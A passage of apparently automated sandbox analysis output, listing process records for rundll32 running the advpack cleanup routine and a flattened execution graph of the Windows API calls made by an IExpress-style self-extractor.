                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:9
                                              Start time:21:03:27
                                              Start date:18/03/2023
                                              Path:C:\Windows\System32\rundll32.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                              Imagebase:0x7ff7c6ff0000
                                              File size:69632 bytes
                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:28.7%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:29.3%
                                                Total number of Nodes:962
                                                Total number of Limit Nodes:25
                                                execution_graph 3119 387270 _except_handler4_common 3120 3869b0 3121 3869b5 3120->3121 3129 386fbe GetModuleHandleW 3121->3129 3123 3869c1 __set_app_type __p__fmode __p__commode 3124 3869f9 3123->3124 3125 386a0e 3124->3125 3126 386a02 __setusermatherr 3124->3126 3131 3871ef _controlfp 3125->3131 3126->3125 3128 386a13 3130 386fcf 3129->3130 3130->3123 3131->3128 3132 3834f0 3133 383504 3132->3133 3134 3835b8 3132->3134 3133->3134 3136 38351b 3133->3136 3137 3835be GetDesktopWindow 3133->3137 3135 383526 3134->3135 3138 383671 EndDialog 3134->3138 3140 38354f 3136->3140 3141 38351f 3136->3141 3154 3843d0 6 API calls 3137->3154 3138->3135 3140->3135 3144 383559 ResetEvent 3140->3144 3141->3135 3143 38352d TerminateThread EndDialog 3141->3143 3143->3135 3145 3844b9 20 API calls 3144->3145 3148 383581 3145->3148 3146 38361d SetWindowTextA CreateThread 3146->3135 3149 383646 3146->3149 3147 3835e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3147->3146 3150 38359b SetEvent 3148->3150 3152 38358a SetEvent 3148->3152 3151 3844b9 20 API calls 3149->3151 3153 383680 4 API calls 3150->3153 3151->3134 3152->3135 3153->3134 3155 384463 SetWindowPos 3154->3155 3157 386ce0 4 API calls 3155->3157 3158 3835d6 3157->3158 3158->3146 3158->3147 3159 386ef0 3160 386f2d 3159->3160 3162 386f02 3159->3162 3161 386f27 ?terminate@ 3161->3160 3162->3160 3162->3161 3163 386bef _XcptFilter 2196 384ca0 GlobalAlloc 2197 386a60 2214 387155 2197->2214 2199 386a65 2200 386a76 GetStartupInfoW 2199->2200 2201 386a93 2200->2201 2202 386aa8 2201->2202 2203 386aaf Sleep 2201->2203 2204 386ac7 _amsg_exit 2202->2204 2205 386ad1 2202->2205 2203->2201 2204->2205 2206 386b13 _initterm 2205->2206 2207 386af4 2205->2207 2212 386b2e __IsNonwritableInCurrentImage 2205->2212 2206->2212 2208 386bd6 _ismbblead 2208->2212 2209 386c1e 2209->2207 2211 386c27 _cexit 2209->2211 2211->2207 2212->2208 2212->2209 2213 386bbe exit 2212->2213 2219 382bfb GetVersion 2212->2219 2213->2212 2215 38717a 2214->2215 2216 38717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2214->2216 2215->2216 2217 3871e2 2215->2217 2218 3871cd 2216->2218 2217->2199 2218->2217 2220 382c0f 2219->2220 2221 382c50 2219->2221 2220->2221 2222 382c13 GetModuleHandleW 2220->2222 2236 382caa memset memset memset 2221->2236 2222->2221 2225 382c22 GetProcAddress 2222->2225 2225->2221 2233 382c34 2225->2233 2226 382c8e 2228 382c9e 2226->2228 2229 382c97 CloseHandle 2226->2229 2228->2212 2229->2228 2233->2221 2234 382c89 2330 381f90 2234->2330 2347 38468f FindResourceA SizeofResource 2236->2347 2239 382ef3 2241 3844b9 20 API calls 2239->2241 2240 382d2d CreateEventA SetEvent 2242 38468f 7 API calls 2240->2242 2243 382d6e 2241->2243 2244 382d57 2242->2244 2352 386ce0 2243->2352 2245 382d5b 2244->2245 2247 382e1f 2244->2247 2250 38468f 7 API calls 2244->2250 2357 3844b9 2245->2357 2386 385c9e 2247->2386 2253 382d9f 2250->2253 2251 382c62 2251->2226 2277 382f1d 2251->2277 2253->2245 2256 382da3 CreateMutexA 2253->2256 2254 382e3a 2257 382e52 FindResourceA 2254->2257 2258 382e43 2254->2258 2255 382e30 2255->2239 2256->2247 2259 382dbd GetLastError 2256->2259 2262 382e6e 2257->2262 2263 382e64 LoadResource 2257->2263 2412 382390 2258->2412 2259->2247 2261 382dca 2259->2261 2265 382dea 2261->2265 2266 382dd5 2261->2266 2264 382e4d 2262->2264 2427 3836ee GetVersionExA 2262->2427 2263->2262 2264->2243 2268 3844b9 20 API calls 2265->2268 2267 3844b9 20 API calls 2266->2267 2270 382de8 2267->2270 2271 382dff 2268->2271 2272 382e04 CloseHandle 2270->2272 2271->2247 2271->2272 2272->2243 2278 382f6c 2277->2278 2279 382f3f 2277->2279 2571 385164 2278->2571 2281 382f5f 2279->2281 2552 3851e5 2279->2552 2699 383a3f 2281->2699 2284 382f71 2313 38303c 2284->2313 2584 3855a0 2284->2584 2288 386ce0 4 API calls 2290 382c6b 2288->2290 2317 3852b6 2290->2317 2291 382f86 GetSystemDirectoryA 2292 38658a CharPrevA 2291->2292 2293 382fab LoadLibraryA 2292->2293 2294 382fc0 GetProcAddress 2293->2294 2295 382ff7 FreeLibrary 2293->2295 2294->2295 2296 382fd6 DecryptFileA 2294->2296 2297 383006 2295->2297 2298 383017 SetCurrentDirectoryA 2295->2298 2296->2295 2305 382ff0 2296->2305 2297->2298 2632 38621e GetWindowsDirectoryA 2297->2632 2299 383054 2298->2299 2300 383026 2298->2300 2302 383061 2299->2302 2642 383b26 2299->2642 2304 3844b9 20 API calls 2300->2304 2310 38307a 2302->2310 2302->2313 2651 38256d 2302->2651 2308 383037 2304->2308 2305->2295 2718 386285 GetLastError 2308->2718 2311 383098 2310->2311 2662 383ba2 2310->2662 2311->2313 2314 3830af 2311->2314 2313->2288 2720 384169 2314->2720 2318 3852d6 2317->2318 2327 385316 2317->2327 2319 385300 LocalFree LocalFree 2318->2319 2321 3852eb SetFileAttributesA DeleteFileA 2318->2321 2319->2318 2319->2327 2320 38538c 2323 386ce0 4 API calls 2320->2323 2321->2319 2322 385374 2322->2320 3050 381fe1 2322->3050 2325 382c72 2323->2325 2325->2226 2325->2234 2326 38535e SetCurrentDirectoryA 2328 382390 13 API calls 2326->2328 2327->2322 2327->2326 2329 3865e8 4 API calls 2327->2329 2328->2322 2329->2326 2331 381f9a 2330->2331 2332 381f9f 2330->2332 2333 381ea7 15 API calls 2331->2333 2334 3844b9 20 API calls 2332->2334 2337 381fd9 2332->2337 2338 381fc0 2332->2338 2333->2332 2334->2338 2335 381ee2 GetCurrentProcess OpenProcessToken 2340 381f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2335->2340 2342 381f0e 2335->2342 2336 381fcf ExitWindowsEx 2336->2337 2337->2226 2338->2335 2338->2336 2338->2337 2341 381f6b ExitWindowsEx 2340->2341 2340->2342 2341->2342 2343 381f1f 2341->2343 2344 3844b9 20 API calls 2342->2344 2345 386ce0 4 API calls 2343->2345 2344->2343 2346 381f8c 2345->2346 2346->2226 2348 382d1a 2347->2348 2349 3846b6 2347->2349 2348->2239 2348->2240 2349->2348 2350 3846be FindResourceA LoadResource LockResource 2349->2350 2350->2348 2351 3846df memcpy_s FreeResource 2350->2351 2351->2348 2353 386ce8 2352->2353 2354 386ceb 2352->2354 2353->2251 2469 386cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2354->2469 2356 386e26 2356->2251 2358 3844fe LoadStringA 2357->2358 2361 38455a 2357->2361 2359 384562 2358->2359 2360 384527 2358->2360 2366 3845c9 2359->2366 2372 38457e 2359->2372 2362 38681f 10 API calls 2360->2362 2363 386ce0 4 API calls 2361->2363 2364 38452c 2362->2364 2365 384689 2363->2365 2367 384536 MessageBoxA 2364->2367 2482 3867c9 2364->2482 2365->2243 2369 3845cd LocalAlloc 2366->2369 2370 384607 LocalAlloc 2366->2370 2367->2361 2369->2361 2376 3845f3 2369->2376 2370->2361 2380 3845c4 2370->2380 2372->2372 2375 384596 LocalAlloc 2372->2375 2374 38462d MessageBeep 2470 38681f 2374->2470 2375->2361 2378 3845af 2375->2378 2379 38171e _vsnprintf 2376->2379 2488 38171e 2378->2488 2379->2380 2380->2374 2383 384645 MessageBoxA LocalFree 2383->2361 2384 3867c9 EnumResourceLanguagesA 2384->2383 2392 385e17 2386->2392 2410 385cc3 2386->2410 2387 386ce0 4 API calls 2389 382e2c 2387->2389 2388 385ced CharNextA 2388->2410 2389->2254 2389->2255 2390 385dec GetModuleFileNameA 2391 385e0a 2390->2391 2390->2392 2498 3866c8 2391->2498 2392->2387 2394 386218 2507 386e2a 2394->2507 2397 385dd0 2397->2390 2397->2392 2398 385e36 CharUpperA 2399 3861d0 2398->2399 2398->2410 2400 3844b9 20 API calls 2399->2400 2401 3861e7 2400->2401 2402 3861f0 CloseHandle 2401->2402 2403 3861f7 ExitProcess 2401->2403 2402->2403 2404 385f9f CharUpperA 2404->2410 2405 385f59 CompareStringA 2405->2410 2406 386003 CharUpperA 2406->2410 2407 38667f IsDBCSLeadByte CharNextA 2407->2410 2408 3860a2 CharUpperA 2408->2410 2409 385edc CharUpperA 2409->2410 2410->2388 2410->2392 2410->2394 2410->2397 2410->2398 2410->2404 2410->2405 2410->2406 2410->2407 2410->2408 2410->2409 2503 38658a 2410->2503 2413 3823b9 2412->2413 2414 3824cb 2412->2414 2413->2414 2417 3823e9 FindFirstFileA 2413->2417 2415 386ce0 4 API calls 2414->2415 2416 3824dc 2415->2416 2416->2264 2417->2414 2425 382407 2417->2425 2418 382479 2422 382488 SetFileAttributesA DeleteFileA 2418->2422 2419 382421 lstrcmpA 2420 3824a9 FindNextFileA 2419->2420 2421 382431 lstrcmpA 2419->2421 2423 3824bd FindClose RemoveDirectoryA 2420->2423 2420->2425 2421->2420 2421->2425 2422->2420 2423->2414 2424 38658a CharPrevA 2424->2425 2425->2418 2425->2419 2425->2420 2425->2424 2426 382390 5 API calls 2425->2426 2426->2425 2432 383737 2427->2432 2434 38372d 2427->2434 2428 3844b9 20 API calls 2429 3839fc 2428->2429 2430 386ce0 4 API calls 2429->2430 2431 382e92 2430->2431 2431->2243 2431->2264 2442 3818a3 2431->2442 2432->2429 2432->2434 2435 3838a4 2432->2435 2514 3828e8 2432->2514 2434->2428 2434->2429 2435->2429 2435->2434 2436 3839c1 MessageBeep 2435->2436 2437 38681f 10 API calls 2436->2437 2438 3839ce 2437->2438 2439 3839d8 MessageBoxA 2438->2439 2440 3867c9 EnumResourceLanguagesA 2438->2440 2439->2429 2440->2439 2443 3818d5 2442->2443 2448 3819b8 2442->2448 2543 3817ee LoadLibraryA 2443->2543 2445 386ce0 4 API calls 2446 3819d5 2445->2446 2446->2264 2462 386517 FindResourceA 2446->2462 2448->2445 2449 3818e5 GetCurrentProcess OpenProcessToken 2449->2448 2450 381900 GetTokenInformation 2449->2450 2451 381918 GetLastError 2450->2451 2452 3819aa CloseHandle 2450->2452 2451->2452 2453 381927 LocalAlloc 2451->2453 2452->2448 2454 381938 GetTokenInformation 2453->2454 2455 3819a9 2453->2455 2456 38194e AllocateAndInitializeSid 2454->2456 2457 3819a2 LocalFree 2454->2457 2455->2452 2456->2457 2461 38196e 2456->2461 2457->2455 2458 381999 FreeSid 2458->2457 2459 381975 EqualSid 2460 38198c 2459->2460 2459->2461 2460->2458 2461->2458 2461->2459 2461->2460 2463 38656b 2462->2463 2464 386536 LoadResource 2462->2464 2466 3844b9 20 API calls 2463->2466 2464->2463 2465 386544 DialogBoxIndirectParamA FreeResource 2464->2465 2465->2463 2467 38657c 2465->2467 2466->2467 2467->2264 2469->2356 2471 386940 2470->2471 2472 386857 GetVersionExA 2470->2472 2474 386ce0 4 API calls 2471->2474 2473 38687c 2472->2473 2481 38691a 2472->2481 2476 3868a5 GetSystemMetrics 2473->2476 2473->2481 2475 38463b 2474->2475 2475->2383 2475->2384 2477 3868b5 RegOpenKeyExA 2476->2477 2476->2481 2478 3868d6 RegQueryValueExA RegCloseKey 2477->2478 2477->2481 2479 38690c 2478->2479 2478->2481 2492 3866f9 2479->2492 2481->2471 2483 3867e2 2482->2483 2484 386803 2482->2484 2496 386793 EnumResourceLanguagesA 2483->2496 2484->2367 2486 3867f5 2486->2484 2497 386793 EnumResourceLanguagesA 2486->2497 2489 38172d 2488->2489 2490 38173d _vsnprintf 2489->2490 2491 38175d 2489->2491 2490->2491 2491->2380 2493 38670f 2492->2493 2494 386740 CharNextA 2493->2494 2495 38674b 2493->2495 2494->2493 2495->2481 2496->2486 2497->2484 2499 3866d5 2498->2499 2500 3866f3 2499->2500 2502 3866e5 CharNextA 2499->2502 2510 386648 2499->2510 2500->2392 2502->2499 2504 38659b 2503->2504 2504->2504 2505 3865b8 CharPrevA 2504->2505 2506 3865ab 2504->2506 2505->2506 2506->2410 2513 386cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2507->2513 2509 38621d 2511 38665d IsDBCSLeadByte 2510->2511 2512 386668 2510->2512 2511->2512 2512->2499 2513->2509 2515 382a62 2514->2515 2519 38290d 2514->2519 2516 382a6e GlobalFree 2515->2516 2517 382a75 2515->2517 2516->2517 2517->2435 2519->2515 2520 382955 GlobalAlloc 2519->2520 2522 382a20 GlobalUnlock 2519->2522 2523 382a80 GlobalUnlock 2519->2523 2524 382773 2519->2524 2520->2515 2521 382968 GlobalLock 2520->2521 2521->2515 2521->2519 2522->2519 2523->2515 2525 3828b2 2524->2525 2526 3827a3 CharUpperA CharNextA CharNextA 2524->2526 2528 3828b7 GetSystemDirectoryA 2525->2528 2527 3827db 2526->2527 2526->2528 2529 3828a8 GetWindowsDirectoryA 2527->2529 2530 3827e3 2527->2530 2531 3828bf 2528->2531 2529->2531 2535 38658a CharPrevA 2530->2535 2532 3828d2 2531->2532 2533 38658a CharPrevA 2531->2533 2534 386ce0 4 API calls 2532->2534 2533->2532 2536 3828e2 2534->2536 2537 382810 RegOpenKeyExA 2535->2537 2536->2519 2537->2531 2538 382837 RegQueryValueExA 2537->2538 2539 38289a RegCloseKey 2538->2539 2540 38285c 2538->2540 2539->2531 2541 382867 ExpandEnvironmentStringsA 2540->2541 2542 38287a 2540->2542 2541->2542 2542->2539 2544 381890 2543->2544 2545 381826 GetProcAddress 2543->2545 2546 386ce0 4 API calls 2544->2546 2547 381889 FreeLibrary 2545->2547 2548 381839 AllocateAndInitializeSid 2545->2548 2549 38189f 2546->2549 2547->2544 2548->2547 2550 38185f FreeSid 2548->2550 2549->2448 2549->2449 2550->2547 2553 38468f 7 API calls 2552->2553 2554 3851f9 LocalAlloc 2553->2554 2555 38522d 2554->2555 2556 38520d 2554->2556 2557 38468f 7 API calls 2555->2557 2558 3844b9 20 API calls 2556->2558 2559 38523a 2557->2559 2560 38521e 2558->2560 2561 38523e 2559->2561 2562 385262 lstrcmpA 2559->2562 2563 386285 GetLastError 2560->2563 2564 3844b9 20 API calls 2561->2564 2565 38527e 2562->2565 2566 385272 LocalFree 2562->2566 2570 382f4d 2563->2570 2567 38524f LocalFree 2564->2567 2568 3844b9 20 API calls 2565->2568 2566->2570 2567->2570 2569 385290 LocalFree 2568->2569 2569->2570 2570->2278 2570->2281 2570->2313 2572 38468f 7 API calls 2571->2572 2573 385175 2572->2573 2574 38517a 2573->2574 2575 3851af 2573->2575 2576 3844b9 20 API calls 2574->2576 2577 38468f 7 API calls 2575->2577 2578 38518d 2576->2578 2579 3851c0 2577->2579 2578->2284 2733 386298 2579->2733 2582 3851e1 2582->2284 2583 3844b9 20 API calls 2583->2578 2585 38468f 7 API calls 2584->2585 2586 3855c7 LocalAlloc 2585->2586 2587 3855db 2586->2587 2588 3855fd 2586->2588 2589 3844b9 20 API calls 2587->2589 2590 38468f 7 API calls 2588->2590 2591 3855ec 2589->2591 2592 38560a 2590->2592 2593 386285 GetLastError 2591->2593 2594 38560e 2592->2594 2595 385632 lstrcmpA 2592->2595 2620 3855f1 2593->2620 2596 3844b9 20 API calls 2594->2596 2597 38564b LocalFree 2595->2597 2598 385645 2595->2598 2599 38561f LocalFree 2596->2599 2600 38565b 2597->2600 2601 385696 2597->2601 2598->2597 2599->2620 2606 385467 49 API calls 2600->2606 2602 38589f 2601->2602 2605 3856ae GetTempPathA 2601->2605 2603 386517 24 API calls 2602->2603 2603->2620 2604 386ce0 4 API calls 2607 382f7e 2604->2607 2608 3856c3 2605->2608 2611 3856eb 2605->2611 2609 385678 2606->2609 2607->2291 2607->2313 2745 385467 2608->2745 2613 3844b9 20 API calls 2609->2613 2609->2620 2614 38586c GetWindowsDirectoryA 2611->2614 2615 385717 GetDriveTypeA 2611->2615 2611->2620 2613->2620 2779 38597d GetCurrentDirectoryA SetCurrentDirectoryA 2614->2779 2616 385730 GetFileAttributesA 2615->2616 2631 38572b 2615->2631 2616->2631 2620->2604 2621 385467 49 API calls 2621->2611 2622 382630 21 API calls 2622->2631 2624 3857c1 GetWindowsDirectoryA 2624->2631 2625 38658a CharPrevA 2627 3857e8 GetFileAttributesA 2625->2627 2626 38597d 34 API calls 2626->2631 2628 3857fa CreateDirectoryA 2627->2628 2627->2631 2628->2631 2629 385827 SetFileAttributesA 2629->2631 2630 385467 49 API calls 2630->2631 2631->2614 2631->2615 2631->2616 2631->2620 2631->2622 2631->2624 2631->2625 2631->2626 2631->2629 2631->2630 2775 386952 2631->2775 2633 386268 2632->2633 2634 386249 2632->2634 2636 38597d 34 API calls 2633->2636 2635 3844b9 20 API calls 2634->2635 2637 38625a 2635->2637 2638 38625f 2636->2638 2639 386285 GetLastError 2637->2639 2640 386ce0 4 API calls 2638->2640 2639->2638 2641 383013 2640->2641 2641->2298 2641->2313 2643 383b2d 2642->2643 2643->2643 2644 383b72 2643->2644 2645 383b53 2643->2645 2845 384fe0 2644->2845 2647 386517 24 API calls 2645->2647 2648 383b70 2647->2648 2649 386298 10 API calls 2648->2649 2650 383b7b 2648->2650 2649->2650 2650->2302 2652 382622 2651->2652 2653 382583 2651->2653 2896 3824e0 GetWindowsDirectoryA 2652->2896 2654 3825e8 RegOpenKeyExA 2653->2654 2655 38258b 2653->2655 2657 382609 RegQueryInfoKeyA 2654->2657 2658 3825e3 2654->2658 2655->2658 2659 38259b RegOpenKeyExA 2655->2659 2660 3825d1 RegCloseKey 2657->2660 2658->2310 2659->2658 2661 3825bc RegQueryValueExA 2659->2661 2660->2658 2661->2660 2663 383bdb 2662->2663 2677 383bec 2662->2677 2665 38468f 7 API calls 2663->2665 2664 383c03 memset 2664->2677 2665->2677 2666 383d13 2667 3844b9 20 API calls 2666->2667 2673 383d26 2667->2673 2669 386ce0 4 API calls 2670 383f60 2669->2670 2670->2311 2671 383fd7 2671->2673 2995 382267 2671->2995 2672 383d7b CompareStringA 2672->2671 2672->2677 2673->2669 2674 383fab 2678 3844b9 20 API calls 2674->2678 2677->2664 2677->2666 2677->2671 2677->2672 2677->2673 2677->2674 2681 383e10 2677->2681 2682 38468f 7 API calls 2677->2682 2683 383f1e LocalFree 2677->2683 2684 383f46 LocalFree 2677->2684 2686 383cc7 CompareStringA 2677->2686 2904 381ae8 2677->2904 2945 38202a memset memset RegCreateKeyExA 2677->2945 2971 383fef 2677->2971 2680 383fbe LocalFree 2678->2680 2680->2673 2687 383e1f GetProcAddress 2681->2687 2688 383f92 2681->2688 2697 383eff FreeLibrary 2681->2697 2698 383f40 FreeLibrary 2681->2698 2985 386495 2681->2985 2682->2677 2683->2671 2683->2677 2684->2673 2686->2677 2687->2681 2689 383f64 2687->2689 2690 3844b9 20 API calls 2688->2690 2691 3844b9 20 API calls 2689->2691 2692 383fa9 2690->2692 2693 383f75 FreeLibrary 2691->2693 2694 383f7c LocalFree 2692->2694 2693->2694 2695 386285 GetLastError 2694->2695 2696 383f8b 2695->2696 2696->2673 2697->2683 2698->2684 2700 38468f 7 API calls 2699->2700 2701 383a55 LocalAlloc 2700->2701 2702 383a6c 2701->2702 2703 383a8e 2701->2703 2704 3844b9 20 API calls 2702->2704 2705 38468f 7 API calls 2703->2705 2706 383a7d 2704->2706 2707 383a98 2705->2707 2708 386285 GetLastError 2706->2708 2709 383a9c 2707->2709 2710 383ac5 lstrcmpA 2707->2710 2711 382f64 2708->2711 2712 3844b9 20 API calls 2709->2712 2713 383ada 2710->2713 2714 383b0d LocalFree 2710->2714 2711->2278 2711->2313 2716 383aad LocalFree 2712->2716 2715 386517 24 API calls 2713->2715 2714->2711 2717 383aec LocalFree 2715->2717 2716->2711 2717->2711 2719 38628f 2718->2719 2719->2313 2721 38468f 7 API calls 2720->2721 2722 38417d LocalAlloc 2721->2722 2723 3841a8 2722->2723 2724 384195 2722->2724 2726 38468f 7 API calls 2723->2726 2725 3844b9 20 API calls 2724->2725 2727 3841a6 2725->2727 2728 3841b5 2726->2728 2727->2313 2729 3841b9 2728->2729 2730 3841c5 lstrcmpA 2728->2730 2732 3844b9 20 API calls 2729->2732 2730->2729 2731 3841e6 LocalFree 2730->2731 2731->2727 2732->2731 2734 38171e _vsnprintf 2733->2734 2735 3862c9 FindResourceA 2734->2735 2737 3862cb LoadResource LockResource 2735->2737 2738 386353 2735->2738 2737->2738 2741 3862e0 2737->2741 2739 386ce0 4 API calls 2738->2739 2740 3851ca 2739->2740 2740->2582 2740->2583 2742 38631b FreeResource 2741->2742 2743 386355 FreeResource 2741->2743 2744 38171e _vsnprintf 2742->2744 2743->2738 2744->2735 2746 38548a 2745->2746 2764 38551a 2745->2764 2805 3853a1 2746->2805 2748 385581 2752 386ce0 4 API calls 2748->2752 2751 385495 2751->2748 2755 38550c 2751->2755 2756 3854c2 GetSystemInfo 2751->2756 2757 38559a 2752->2757 2753 38553b CreateDirectoryA 2758 385577 2753->2758 2759 385547 2753->2759 2754 38554d 2754->2748 2760 38597d 34 API calls 2754->2760 2761 38658a CharPrevA 2755->2761 2768 3854da 2756->2768 2757->2620 2769 382630 GetWindowsDirectoryA 2757->2769 2762 386285 GetLastError 2758->2762 2759->2754 2763 38555c 2760->2763 2761->2764 2765 38557c 2762->2765 2763->2748 2767 385568 RemoveDirectoryA 2763->2767 2816 3858c8 2764->2816 2765->2748 2766 38658a CharPrevA 2766->2755 2767->2748 2768->2755 2768->2766 2770 38265e 2769->2770 2771 38266f 2769->2771 2772 3844b9 20 API calls 2770->2772 2773 386ce0 4 API calls 2771->2773 2772->2771 2774 382687 2773->2774 2774->2611 2774->2621 2776 38696e GetDiskFreeSpaceA 2775->2776 2777 3869a1 2775->2777 2776->2777 2778 386989 MulDiv 2776->2778 2777->2631 2778->2777 2780 3859bb 2779->2780 2781 3859dd GetDiskFreeSpaceA 2779->2781 2784 3844b9 20 API calls 2780->2784 2782 385ba1 memset 2781->2782 2783 385a21 MulDiv 2781->2783 2786 386285 GetLastError 2782->2786 2783->2782 2787 385a50 GetVolumeInformationA 2783->2787 2785 3859cc 2784->2785 2788 386285 GetLastError 2785->2788 2789 385bbc GetLastError FormatMessageA 2786->2789 2790 385a6e memset 2787->2790 2791 385ab5 SetCurrentDirectoryA 2787->2791 2792 3859d1 2788->2792 2793 385be3 2789->2793 2794 386285 GetLastError 2790->2794 2795 385acc 2791->2795 2799 386ce0 4 API calls 2792->2799 2796 3844b9 20 API calls 2793->2796 2797 385a89 GetLastError FormatMessageA 2794->2797 2801 385b0a 2795->2801 2803 385b20 2795->2803 2798 385bf5 SetCurrentDirectoryA 2796->2798 2797->2793 2798->2792 2800 385c11 2799->2800 2800->2611 2802 3844b9 20 API calls 2801->2802 2802->2792 2803->2792 2828 38268b 2803->2828 2807 3853bf 2805->2807 2806 38171e _vsnprintf 2806->2807 2807->2806 2808 38658a CharPrevA 2807->2808 2811 385415 GetTempFileNameA 2807->2811 2809 3853fa RemoveDirectoryA GetFileAttributesA 2808->2809 2809->2807 2810 38544f CreateDirectoryA 2809->2810 2810->2811 2813 38543a 2810->2813 2812 385429 DeleteFileA CreateDirectoryA 2811->2812 2811->2813 2812->2813 2814 386ce0 4 API calls 2813->2814 2815 385449 2814->2815 2815->2751 2817 3858d8 2816->2817 2817->2817 2818 3858df LocalAlloc 2817->2818 2819 3858f3 2818->2819 2821 385919 2818->2821 2820 3844b9 20 API calls 2819->2820 2827 385906 2820->2827 2823 38658a CharPrevA 2821->2823 2822 386285 GetLastError 2824 385534 2822->2824 2825 385931 CreateFileA LocalFree 2823->2825 2824->2753 2824->2754 2826 38595b CloseHandle GetFileAttributesA 2825->2826 2825->2827 2826->2827 2827->2822 2827->2824 2829 3826b9 2828->2829 2830 3826e5 2828->2830 2833 38171e _vsnprintf 2829->2833 2831 3826ea 2830->2831 2832 38271f 2830->2832 2834 38171e _vsnprintf 2831->2834 2837 38171e _vsnprintf 2832->2837 2843 3826e3 2832->2843 2835 3826cc 2833->2835 2836 3826fd 2834->2836 2839 3844b9 20 API calls 2835->2839 2840 3844b9 20 API calls 2836->2840 2841 382735 2837->2841 2838 386ce0 4 API calls 2842 38276d 2838->2842 2839->2843 2840->2843 2844 3844b9 20 API calls 2841->2844 2842->2792 2843->2838 2844->2843 2846 38468f 7 API calls 2845->2846 2847 384ff5 FindResourceA LoadResource LockResource 2846->2847 2848 385020 2847->2848 2861 38515f 2847->2861 2849 385029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2848->2849 2850 385057 2848->2850 2849->2850 2864 384efd 2850->2864 2853 38507c 2856 385075 2853->2856 2857 3844b9 20 API calls 2853->2857 2854 385060 2855 3844b9 20 API calls 2854->2855 2855->2856 2858 385110 FreeResource 2856->2858 2860 38511d 2856->2860 2857->2856 2858->2860 2859 38513a 2859->2861 2862 38514c SendMessageA 2859->2862 2860->2859 2863 3844b9 20 API calls 2860->2863 2861->2648 2862->2861 2863->2859 2865 384f4a 2864->2865 2871 384fa1 2865->2871 2872 384980 2865->2872 2867 386ce0 4 API calls 2869 384fc6 2867->2869 2869->2853 2869->2854 2871->2867 2873 384990 2872->2873 2874 3849c2 lstrcmpA 2873->2874 2875 3849a5 2873->2875 2877 384a0e 2874->2877 2878 3849ba 2874->2878 2876 3844b9 20 API calls 2875->2876 2876->2878 2877->2878 2883 38487a 2877->2883 2878->2871 2880 384b60 2878->2880 2881 384b92 FindCloseChangeNotification 2880->2881 2882 384b76 2880->2882 2881->2882 2882->2871 2884 3848a2 CreateFileA 2883->2884 2886 384908 2884->2886 2887 3848e9 2884->2887 2886->2878 2887->2886 2888 3848ee 2887->2888 2891 38490c 2888->2891 2892 3848f5 CreateFileA 2891->2892 2894 384917 2891->2894 2892->2886 2893 384962 CharNextA 2893->2894 2894->2892 2894->2893 2895 384953 CreateDirectoryA 2894->2895 2895->2893 2897 38255b 2896->2897 2898 382510 2896->2898 2900 386ce0 4 API calls 2897->2900 2899 38658a CharPrevA 2898->2899 2901 382522 WritePrivateProfileStringA _lopen 2899->2901 2902 382569 2900->2902 2901->2897 2903 382548 _llseek _lclose 2901->2903 2902->2658 2903->2897 2905 381b25 2904->2905 3009 381a84 2905->3009 2907 381b57 2908 38658a CharPrevA 2907->2908 2910 381b8c 2907->2910 2908->2910 2909 3866c8 2 API calls 2911 381bd1 2909->2911 2910->2909 2912 381bd9 CompareStringA 2911->2912 2913 381d73 2911->2913 2912->2913 2914 381bf7 GetFileAttributesA 2912->2914 2915 3866c8 2 API calls 2913->2915 2916 381c0d 2914->2916 2917 381d53 2914->2917 2918 381d7d 2915->2918 2916->2917 2924 381a84 2 API calls 2916->2924 2919 381d64 2917->2919 2920 381df8 LocalAlloc 2918->2920 2921 381d81 CompareStringA 2918->2921 2922 3844b9 20 API calls 2919->2922 2920->2919 2923 381e0b GetFileAttributesA 2920->2923 2921->2920 2928 381d9b 2921->2928 2925 381d6c 2922->2925 2936 381e1d 2923->2936 2943 381e45 2923->2943 2926 381c31 2924->2926 2930 386ce0 4 API calls 2925->2930 2927 381c50 LocalAlloc 2926->2927 2932 381a84 2 API calls 2926->2932 2927->2919 2929 381c67 GetPrivateProfileIntA GetPrivateProfileStringA 2927->2929 2928->2928 2931 381dbe LocalAlloc 2928->2931 2938 381cf8 2929->2938 2942 381cc2 2929->2942 2935 381ea1 2930->2935 2931->2919 2937 381de1 2931->2937 2932->2927 2935->2677 2936->2943 2939 38171e _vsnprintf 2937->2939 2940 381d09 GetShortPathNameA 2938->2940 2941 381d23 2938->2941 2939->2942 2940->2941 2944 38171e _vsnprintf 2941->2944 2942->2925 3015 382aac 2943->3015 2944->2942 2946 38209a 2945->2946 2947 382256 2945->2947 2949 38171e _vsnprintf 2946->2949 2952 3820dc 2946->2952 2948 386ce0 4 API calls 2947->2948 2950 382263 2948->2950 2951 3820af RegQueryValueExA 2949->2951 2950->2677 2951->2946 2951->2952 2953 3820fb GetSystemDirectoryA 2952->2953 2954 3820e4 RegCloseKey 2952->2954 2955 38658a CharPrevA 2953->2955 2954->2947 2956 38211b LoadLibraryA 2955->2956 2957 382179 GetModuleFileNameA 2956->2957 2958 38212e GetProcAddress FreeLibrary 2956->2958 2959 3821de RegCloseKey 2957->2959 2963 382177 2957->2963 2958->2957 2960 38214e GetSystemDirectoryA 2958->2960 2959->2947 2961 382165 2960->2961 2960->2963 2962 38658a CharPrevA 2961->2962 2962->2963 2963->2963 2964 3821b7 LocalAlloc 2963->2964 2965 3821ec 2964->2965 2966 3821cd 2964->2966 2968 38171e _vsnprintf 2965->2968 2967 3844b9 20 API calls 2966->2967 2967->2959 2969 382218 RegSetValueExA RegCloseKey LocalFree 2968->2969 2969->2947 2972 384016 